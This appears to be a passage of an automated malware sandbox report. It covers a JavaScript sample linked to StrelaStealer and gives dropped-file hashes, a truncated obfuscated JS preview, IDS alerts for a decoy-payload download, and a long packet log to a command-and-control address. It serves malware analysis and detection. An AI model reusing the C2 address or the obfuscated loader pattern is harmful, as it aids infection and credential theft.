                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                        Category:dropped
                        Size (bytes):1407294
                        Entropy (8bit):7.97605879016224
                        Encrypted:false
                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                        Malicious:false
                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                        Category:dropped
                        Size (bytes):758601
                        Entropy (8bit):7.98639316555857
                        Encrypted:false
                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                        MD5:3A49135134665364308390AC398006F1
                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                        Malicious:false
                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PDF document, version 1.7
                        Category:dropped
                        Size (bytes):635764
                        Entropy (8bit):7.929592005409041
                        Encrypted:false
                        SSDEEP:12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ
                        MD5:91A2AF9E2A61ABF7D9977999FBF9879E
                        SHA1:F6E4FA02DD15B27F74553FB1B220A4D2DF385267
                        SHA-256:FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A
                        SHA-512:8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C
                        Malicious:true
                        Preview:%PDF-1.7.%.....1 0 obj.<< /Pages 3 0 R /Type /Catalog >>.endobj.2 0 obj.<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>.stream.x.3V0.Q.w./.+Q0T...L)V.V0Q0P.R.U...,HU..HLO-V.....%0.mendstream.endobj.4 0 obj.<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>.endobj.5 0 obj.<< /Filter /FlateDecode /Length 75 >>.stream.x.3T0.B]C aab.gi....U.e...E........\ E..&@yC.:.l.B.W.B!P9D..~...K>W ...&...endstream.endobj.6 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>.endobj.7 0 obj.<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>.stream.x.+..T(..O/6PH/.*.2.4.4S0.B]......H...O..S.04Tp....B.....endstream.endobj.8 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>.endobj.9 0 obj.<< /BitsPerCo
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):98682
                        Entropy (8bit):6.445287254681573
                        Encrypted:false
                        SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                        MD5:7113425405A05E110DC458BBF93F608A
                        SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                        SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                        SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                        Malicious:false
                        Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.501268097735403
                        Encrypted:false
                        SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                        MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                        SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                        SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                        SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                        Malicious:false
                        Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                        Process:C:\Windows\System32\svchost.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):55
                        Entropy (8bit):4.306461250274409
                        Encrypted:false
                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                        Malicious:false
                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                        File type:ASCII text, with very long lines (10538), with no line terminators
                        Entropy (8bit):4.976909856197665
                        TrID:
                          File name:2330118683179179335.js
                          File size:10'538 bytes
                          MD5:084b1b952ac9db0178cef961a98bdda2
                          SHA1:7d1ef74fe1282cb6c4d9eb954e9791fa68091b43
                          SHA256:87232fe5592e8fc041f96531fa62db9faa5912ff8157e131a2c66c9c2ed314d1
                          SHA512:cf33306fea79c7308c03c9b0a813152f9b317f3cc9269fcf98ee33f7315814b4937ff0904855f5130cf201292b03effb5a7f8180bde8d47d28478049a2908231
                          SSDEEP:192:LmKnKuw6JJJdOsrJJJduh0tMJmqywXVimpV6mtcDAeFObIKU9:RnKuw6JJJdOsrJJJduh0tMJJ6mtcDAeN
                          TLSH:0222A57CF8B18E637CE3D17AA01AD8A34A8C029E935982D06A9644CF47A4F444FD79F1
                          File Content Preview:function pmrjir(){this[jopltxl+qoegyr+piisgmm+piuweynw]("xfbhrjly=[1031,3079,5127,4103,2055,3072];var ltnwcvkmp=this[pqpxricd+piisgmm+zmvat+tyqtziv+jopltxl+ebyttknlk+yxsly+ziijnicxr](this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][jcilp+zmva
                          Icon Hash:68d69b8bb6aa9a86
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-01-14T08:56:28.623259+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849704193.143.1.20580TCP
                          2025-01-14T08:56:28.623259+01002859560ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET)1192.168.2.849704193.143.1.20580TCP
                          2025-01-14T08:56:31.241010+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.849705193.143.1.2058888TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 08:56:27.790682077 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:27.795684099 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:27.795774937 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:27.798816919 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:27.803592920 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623066902 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623085022 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623095989 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623102903 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623114109 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623123884 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623133898 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623143911 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623158932 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623167992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.623259068 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.623388052 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.628038883 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.678390980 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.684669971 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.684681892 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.684693098 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.684760094 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.740906000 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744112968 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744148016 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744162083 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744179010 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744199038 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744208097 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744220018 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744581938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744605064 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744627953 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744791031 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744832039 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744857073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744879007 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744894981 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744908094 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.744920015 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.744946003 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.745729923 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.745750904 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.745765924 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.745779991 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.745794058 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.745804071 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.745846033 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.746613026 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.746637106 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.746656895 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.774389029 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.774441004 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.805646896 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.805668116 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.805681944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.805713892 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.805864096 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.805887938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.805918932 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.833959103 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.833986998 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.834026098 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.864944935 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.864972115 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.864981890 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.864993095 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.865009069 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865016937 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.865241051 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865251064 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865273952 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.865513086 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865523100 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865531921 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865554094 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.865582943 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.865953922 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865963936 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865973949 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865983963 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.865995884 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866034031 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.866034031 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.866718054 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866735935 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866745949 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866770983 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.866776943 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.866786957 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866796970 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.866837025 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.867707968 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.867717981 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.867728949 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.867738008 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.867747068 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.867757082 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.867763042 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.868546963 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.868556976 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.868567944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.868575096 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.868583918 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.868593931 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.868660927 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.868660927 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.869396925 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.869405985 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.869415998 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.869425058 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.869436026 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.869463921 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.870246887 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.870265007 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.870274067 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.870280027 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.870307922 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.895469904 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.895481110 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.895514965 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.895600080 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.895608902 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.895620108 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.895637035 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.926734924 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.926757097 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.926774025 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.926783085 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.926795006 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.926808119 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.926902056 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.926902056 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.927175045 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.927194118 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.927229881 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.927251101 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.927262068 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.927428007 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.954746962 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.985974073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986005068 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986017942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986028910 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986042976 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986057997 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.986171007 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.986449003 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986463070 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986515045 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.986658096 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986685991 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986696959 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.986717939 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.987198114 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.987217903 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.987229109 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.987246037 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.987257957 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.987270117 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.987278938 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.987301111 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.988289118 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.988301039 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.988312960 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.988326073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.988337040 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.988348007 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.988363981 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.989027977 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989038944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989049911 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989062071 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989070892 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.989079952 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989098072 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.989177942 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.989892006 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989906073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989918947 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989931107 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989942074 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.989955902 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.989963055 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.990771055 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.990783930 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.990796089 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.990808964 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.990825891 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.990833998 CET8049704193.143.1.205192.168.2.8
